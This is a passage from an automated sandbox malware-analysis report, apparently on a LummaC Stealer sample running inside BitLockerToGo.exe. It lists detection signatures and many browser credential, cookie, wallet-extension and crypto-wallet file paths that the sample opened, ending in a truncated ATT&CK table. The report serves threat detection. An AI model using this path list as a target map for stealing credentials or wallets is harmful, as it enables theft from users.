              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BitLockerToGo.exeString found in binary or memory: Jaxx Liberty
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BitLockerToGo.exeString found in binary or memory: Wallets/Exodus
              Source: MdhO83N5Fm.exe, 00000000.00000000.2059093154.00000000020C8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: github.com/go-playground/validator/v10.isEthereumAddress
              Source: BitLockerToGo.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPSJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2408545066.000000000053C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2458797164.000000000053D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2364845669.000000000053B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2363683286.000000000052A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2363820686.000000000053B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2364785465.000000000052F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2407902307.000000000053C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2430904612.000000000053C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5284, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5284, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
              Windows Management Instrumentation              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services41
              Data from Local System              		1
